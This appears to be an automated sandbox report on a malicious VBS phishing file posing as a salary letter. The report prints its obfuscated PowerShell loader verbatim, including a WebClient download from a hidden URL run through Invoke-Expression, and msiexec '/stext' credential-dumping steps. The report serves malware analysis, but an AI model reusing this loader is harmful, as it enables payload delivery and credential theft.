Source: msiexec.exe, msiexec.exe, 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: Salary Increase Letter_Oct 2024.vbs Virustotal: Detection: 7%
Source: C:\Windows\SysWOW64\msiexec.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Increase Letter_Oct 2024.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gearstngers Checkoffs Unappealingly spectatress Asynkron Proglottis #>;$Romancy='Greyfly';<#Israelitter Dikotomien Pavens Dokumentbehandlings Xenophobia Nel #>;$Glossocomium44=$Velstandsstigning+$host.UI;If ($Glossocomium44) {$Kautioneringernes++;}function Perspicable($React){$Yecchs=$stactes+$React.'Length'-$Kautioneringernes; for( $Mglingernes=3;$Mglingernes -lt $Yecchs;$Mglingernes+=4){$Kordninger='Romancens';$Tudehovedets+=$React[$Mglingernes];$Tusindfryds='stenrkners';}$Tudehovedets;}function Unmudded($Listevalget){ & ($Bikarbonaters) ($Listevalget);}$Fagomraadernes=Perspicable ' I MFrsof.rzDiai splTollnedas r/Lgn5Bla.Wee0Dmo Win(NysWUnciAfhnl ad U oUnswOvese,u C N D TCey ste1Dem0Par.For0.ry; as aaW,luiTr.nJ,n6Hum4Cri;Pla skaxOpe6Gyr4s m;Per UrirUgevDiv:Er.1Hys2bet1slu.Hal0For)F,r re GForeVi.c s.kFagoKon/Emp2Gar0 No1s m0Aut0Co 1Ph,0 Ud1,po NiF HoiAzorspkesalfT doAgrxTis/Fre1Fej2gas1U,f.Amb0 u ';$Novelisers=Perspicable ' quuFiss P.EFedr ,v-T.oABnfg E e ensp T B. ';$stigma=Perspicable 'R,th V t yptstepFla:Vol/ i/A.gl tunFo 6sexb a9 Ga. Ens nhsouoR spDam/ dsIsndB Roo eld reHGlyWBreP FewHow/ scKNomo svkNokkDraeBesrObteAb r ChiEndnU sg Ar.stioCh.c Inx ev ';$Milieuers=Perspicable 'b r>Ben ';$Bikarbonaters=Perspicable ' asiKivE uXCh, ';$Paraffineredes='implicity';$stofmisbrugs='\Lokumernes.sus';Unmudded (Perspicable 'Usi$ flgEm L Reo Vab slA OmL Ha: CaFstuO opR erdIcom A Tjou= Ls$wheeVe,NPotv et:MonaFysPElsPA pdAi ATreTIntA,ro+ co$Laks rTVacOsenF orM raI DessveBEntrsakUPu gEubsBoh ');Unmudded (Perspicable 'Pol$ ftgManl tro unBsamAIntLPej: MtT whuD,mAT xr o EPargAre=bac$ .asAdrtArviIncg D,M naaGav.Tils LaPBetLBe.IPo T Tr(Unp$ColMagaisagLP eIskoELanuUndE.roRRe,sKon)Pla ');Unmudded (Perspicable 'Hel[smanAtteTritA k.DefsAnoe.lorKr v niiMa,C suE,krPferOsliiR,mNtr t agM efA vnNforAAn G .yEImpRW m]Kal:pri: KasF reMe cs,ruBalrsmaINobtH eystrP stRRenoBr.t B o sac.mao roLCh c o=Vib sov[ PiNUnbesnvtLet.Cars FoETryCRekU HeRstai TitTidY FlPCurRN.do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable ' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM lmFev.M cn,hoeArmT sa. stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko ';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyG
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Gearstngers Checkoffs Unappealingly spectatress Asynkron Proglottis #>;$Romancy='Greyfly';<#Israelitter Dikotomien Pavens Dokumentbehandlings Xenophobia Nel #>;$Glossocomium44=$Velstandsstigning+$host.UI;If ($Glossocomium44) {$Kautioneringernes++;}function Perspicable($React){$Yecchs=$stactes+$React.'Length'-$Kautioneringernes; for( $Mglingernes=3;$Mglingernes -lt $Yecchs;$Mglingernes+=4){$Kordninger='Romancens';$Tudehovedets+=$React[$Mglingernes];$Tusindfryds='stenrkners';}$Tudehovedets;}function Unmudded($Listevalget){ & ($Bikarbonaters) ($Listevalget);}$Fagomraadernes=Perspicable ' I MFrsof.rzDiai splTollnedas r/Lgn5Bla.Wee0Dmo Win(NysWUnciAfhnl ad U oUnswOvese,u C N D TCey ste1Dem0Par.For0.ry; as aaW,luiTr.nJ,n6Hum4Cri;Pla skaxOpe6Gyr4s m;Per UrirUgevDiv:Er.1Hys2bet1slu.Hal0For)F,r re GForeVi.c s.kFagoKon/Emp2Gar0 No1s m0Aut0Co 1Ph,0 Ud1,po NiF HoiAzorspkesalfT doAgrxTis/Fre1Fej2gas1U,f.Amb0 u ';$Novelisers=Perspicable ' quuFiss P.EFedr ,v-T.oABnfg E e ensp T B. ';$stigma=Perspicable 'R,th V t yptstepFla:Vol/ i/A.gl tunFo 6sexb a9 Ga. Ens nhsouoR spDam/ dsIsndB Roo eld reHGlyWBreP FewHow/ scKNomo svkNokkDraeBesrObteAb r ChiEndnU sg Ar.stioCh.c Inx ev ';$Milieuers=Perspicable 'b r>Ben ';$Bikarbonaters=Perspicable ' asiKivE uXCh, ';$Paraffineredes='implicity';$stofmisbrugs='\Lokumernes.sus';Unmudded (Perspicable 'Usi$ flgEm L Reo Vab slA OmL Ha: CaFstuO opR erdIcom A Tjou= Ls$wheeVe,NPotv et:MonaFysPElsPA pdAi ATreTIntA,ro+ co$Laks rTVacOsenF orM raI DessveBEntrsakUPu gEubsBoh ');Unmudded (Perspicable 'Pol$ ftgManl tro unBsamAIntLPej: MtT whuD,mAT xr o EPargAre=bac$ .asAdrtArviIncg D,M naaGav.Tils LaPBetLBe.IPo T Tr(Unp$ColMagaisagLP eIskoELanuUndE.roRRe,sKon)Pla ');Unmudded (Perspicable 'Hel[smanAtteTritA k.DefsAnoe.lorKr v niiMa,C suE,krPferOsliiR,mNtr t agM efA vnNforAAn G .yEImpRW m]Kal:pri: KasF reMe cs,ruBalrsmaINobtH eystrP stRRenoBr.t B o sac.mao roLCh c o=Vib sov[ PiNUnbesnvtLet.Cars FoETryCRekU HeRstai TitTidY FlPCurRN.do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable ' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM lmFev.M cn,hoeArmT sa. stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko ';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyG
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\bacgpbljvxtooetxcadtvibkg"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp"
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ownrimoexwdxbqdncvlwjzqsqkiyhshe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gearstngers Checkoffs Unappealingly spectatress Asynkron Proglottis #>;$Romancy='Greyfly';<#Israelitter Dikotomien Pavens Dokumentbehandlings Xenophobia Nel #>;$Glossocomium44=$Velstandsstigning+$host.UI;If ($Glossocomium44) {$Kautioneringernes++;}function Perspicable($React){$Yecchs=$stactes+$React.'Length'-$Kautioneringernes; for( $Mglingernes=3;$Mglingernes -lt $Yecchs;$Mglingernes+=4){$Kordninger='Romancens';$Tudehovedets+=$React[$Mglingernes];$Tusindfryds='stenrkners';}$Tudehovedets;}function Unmudded($Listevalget){ & ($Bikarbonaters) ($Listevalget);}$Fagomraadernes=Perspicable ' I MFrsof.rzDiai splTollnedas r/Lgn5Bla.Wee0Dmo Win(NysWUnciAfhnl ad U oUnswOvese,u C N D TCey ste1Dem0Par.For0.ry; as aaW,luiTr.nJ,n6Hum4Cri;Pla skaxOpe6Gyr4s m;Per UrirUgevDiv:Er.1Hys2bet1slu.Hal0For)F,r re GForeVi.c s.kFagoKon/Emp2Gar0 No1s m0Aut0Co 1Ph,0 Ud1,po NiF HoiAzorspkesalfT doAgrxTis/Fre1Fej2gas1U,f.Amb0 u ';$Novelisers=Perspicable ' quuFiss P.EFedr ,v-T.oABnfg E e ensp T B. ';$stigma=Perspicable 'R,th V t yptstepFla:Vol/ i/A.gl tunFo 6sexb a9 Ga. Ens nhsouoR spDam/ dsIsndB Roo eld reHGlyWBreP FewHow/ scKNomo svkNokkDraeBesrObteAb r ChiEndnU sg Ar.stioCh.c Inx ev ';$Milieuers=Perspicable 'b r>Ben ';$Bikarbonaters=Perspicable ' asiKivE uXCh, ';$Paraffineredes='implicity';$stofmisbrugs='\Lokumernes.sus';Unmudded (Perspicable 'Usi$ flgEm L Reo Vab slA OmL Ha: CaFstuO opR erdIcom A Tjou= Ls$wheeVe,NPotv et:MonaFysPElsPA pdAi ATreTIntA,ro+ co$Laks rTVacOsenF orM raI DessveBEntrsakUPu gEubsBoh ');Unmudded (Perspicable 'Pol$ ftgManl tro unBsamAIntLPej: MtT whuD,mAT xr o EPargAre=bac$ .asAdrtArviIncg D,M naaGav.Tils LaPBetLBe.IPo T Tr(Unp$ColMagaisagLP eIskoELanuUndE.roRRe,sKon)Pla ');Unmudded (Perspicable 'Hel[smanAtteTritA k.DefsAnoe.lorKr v niiMa,C suE,krPferOsliiR,mNtr t agM efA vnNforAAn G .yEImpRW m]Kal:pri: KasF reMe cs,ruBalrsmaINobtH eystrP stRRenoBr.t B o sac.mao roLCh c o=Vib sov[ PiNUnbesnvtLet.Cars FoETryCRekU HeRstai TitTidY FlPCurRN.do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable ' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM lmFev.M cn,hoeArmT sa. stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko ';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyG Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\bacgpbljvxtooetxcadtvibkg" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ownrimoexwdxbqdncvlwjzqsqkiyhshe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dnsapi.dll Jump to behavior
